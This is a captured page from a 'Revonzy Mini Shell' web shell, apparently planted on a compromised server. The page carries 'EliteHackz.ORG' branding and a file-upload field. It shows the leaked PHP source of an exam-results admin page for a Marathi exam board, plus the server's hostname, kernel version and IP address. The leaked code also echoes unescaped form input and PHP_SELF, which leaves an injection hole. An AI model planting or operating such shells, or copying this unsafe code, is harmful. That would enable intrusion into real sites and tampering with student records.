Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/www/panel.atsevairag.com/atse/atse_admin_panel007/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/www/panel.atsevairag.com/atse/atse_admin_panel007/result-info-update.php

<!--
	Powered By - Dream Technology, Solapur.
	Contact No : +91 9595775120
	Email ID - dream.technology@outlook.com
-->
<?php
	ob_start();
	//import the functions file
	require_once("../lib/class/functions.php");
	
	//create object of class file
	$db = new functions();
	
	$current_page = "";
	
?>
<DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<title>ए. टी. एस. ई. वैराग</title>

	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
	<meta name="description" content="">
	<meta name="keywords" content="">

	<link rel="stylesheet" type="text/css" href="/css/stylesheet.css" />
	<link rel="stylesheet" type="text/css" href="/css/jquery-ui.css" />
	<script type="text/javascript" src="/js/jquery-1.9.1.min.js"></script>
    <script type="text/javascript" src="/js/jssor.slider.mini.js"></script>
	<script type="text/javascript" src="/js/site.js"></script>
	
  <script src="/js/jquery-ui.js"></script>
  
  <script>
  $( function() {
    var availableTags = [
      "केंद्रात पहिला",
      "केंद्रात दुसरा",
      "केंद्रात तिसरा",
      "केंद्रात चौथा",
      "केंद्रात पाचवा",
      "केंद्रात सहावा",
      "केंद्रात सातवा",
      "केंद्रात आठवा",
      "केंद्रात नववा",
      "केंद्रात दहावा",
      "जिल्ह्यात पहिला",
      "जिल्ह्यात दुसरा",
      "जिल्ह्यात तिसरा",
      "जिल्ह्यात चौथा",
      "जिल्ह्यात पाचवा",
      "जिल्ह्यात सहावा",
      "जिल्ह्यात सातवा",
      "जिल्ह्यात आठवा",
      "जिल्ह्यात नववा",
      "जिल्ह्यात दहावा",
      "राज्यात पहिला",
      "राज्यात दुसरा",
	  "राज्यात तिसरा",
	  "राज्यात चौथा",
	  "राज्यात पाचवा",
	  "राज्यात सहावा",
	  "राज्यात सातवा",
	  "राज्यात आठवा",
	  "राज्यात नववा",
	  "राज्यात दहावा"
    ];
    $( "#shera" ).autocomplete({
      source: availableTags
    });
  } );
  </script>
</head>
<body>
	<?php
		require_once("header.php");
	?>
		
	<div name="tab_container" >
		<div class="main_container" style="min-height:610px;">
		
		
			<?php
				//require_once("highlights.php");
			?>
			
			<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" name="reg_form">
			
			<div class="data_container" style="margin-top:0px; padding-top:0px;">
			
				<div class="info-section">
					<br />
			<center><strong>रिजल्ट माहिती अपडेट करा</strong></center>
			<hr />
					
					<?php
					
					
						$success_msg_n	=	0;
					
						$registration_no_error	=	"";
						$exam_seat_no_error		=	"";
						$flag	=	0;
						$reg_number 			= 	"";
						$exam_seat_no			=	"";
							$bhasha_ganit	=	"";
							$eng_buddhimatta=	"";
							$total_marks	=	"";
							$shera		=	"";
							
						
						if(isset($_POST['registration_no']))
						{
							$reg_number 	= 	$_POST['registration_no'];
							//$exam_seat_no	=	$_POST['exam_seat_no'];
							$bhasha_ganit	=	$_POST['bhasha_ganit'];
							$eng_buddhimatta=	$_POST['eng_buddhimatta'];
							$total_marks	=	$_POST['total_marks'];
							$shera		=	$_POST['shera'];

							if($reg_number=="")
							{
								$registration_no_error	=	"नोंदणी क्रमांक लिहा";
								$flag	=	1;
							}
							else if(!is_numeric($reg_number))
							{
								$registration_no_error	=	"नोंदणी क्रमांक नंबरमध्ये लिहा";
								$flag	=	1;
							}
							
							/*if($exam_seat_no=="")
							{
								$exam_seat_no_error	=	"आसन क्रमांक लिहा";
								$flag	=	1;
							}
							else if(!is_numeric($exam_seat_no))
							{
								$exam_seat_no_error	=	"आसन क्रमांक नंबरमध्ये लिहा";
								$flag	=	1;
							}*/
							
							if($flag==0)
							{
								$student_id	=	$db->get_student_id_from_seat_no_single_val_check($reg_number);
								
								if($student_id=="")
								{
									$registration_no_error	=	"तुम्ही चुकीचा नोंदणी क्र. किंवा आसन क्र. लिहला आहे.";
								}
								else
								{
									if($bhasha_ganit!="" AND $eng_buddhimatta!="" AND $total_marks!="")
									{
										if($db->update_stud_marks_details($reg_number,$exam_seat_no,$bhasha_ganit,$eng_buddhimatta,$total_marks,$shera))
										{
											$success_msg_n	=	1;
											echo "Record Updated Successfully";
										}
													//header("Location:/print-hall-ticket.php?stud_id=".$student_id);
									}
									else if($reg_number!="" AND $shera!="")				
									{
										if($db->update_stud_marks_details_from_reg_no($reg_number,$shera))
										{
											$success_msg_n	=	1;
											echo "Record Updated Successfully";
										}
									}
								}
							}
							
						}
					?>
					<div class="hall_ticket_contnr_bx">
						<input type="text" name="registration_no" class="receipt_info_box" placeholder="नोंदणी क्रमांक" value="<?php echo $reg_number; ?>" 
 required />
						<span class="error_indicator_hall_ticket"><?php echo $registration_no_error; ?></span>
						<!--<input type="text" name="exam_seat_no" class="receipt_info_box" placeholder="आसन क्रमांक" value="<?php echo $exam_seat_no; ?>" required />-->
 
 						<input type="text" name="shera" id="shera" class="receipt_info_box" placeholder="शेरा" value="<?php echo $shera; ?>" required />
						<span class="error_indicator_hall_ticket"><?php echo $exam_seat_no_error; ?></span>
						
						
						<input type="text" name="bhasha_ganit" class="receipt_info_box" placeholder="भाषा / गणित मार्क्स " value="<?php echo $bhasha_ganit; ?>" />
						
						<input type="text" name="eng_buddhimatta" class="receipt_info_box" placeholder="इंग्रजी / बुद्धिमत्ता मार्क्स" value="<?php echo $eng_buddhimatta; ?>" />
						
						<input type="text" name="total_marks" class="receipt_info_box" placeholder="एकूण मार्क्स" value="<?php echo $total_marks; ?>" />					
												
						<input type="submit" name="submit_receit_info" class="hall_ticket_btn" />
					</div>
					
				</div>
			</div>
			</form>
		</div>
	</div>
			
	<?php
		require_once("footer.php");
	?>
</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4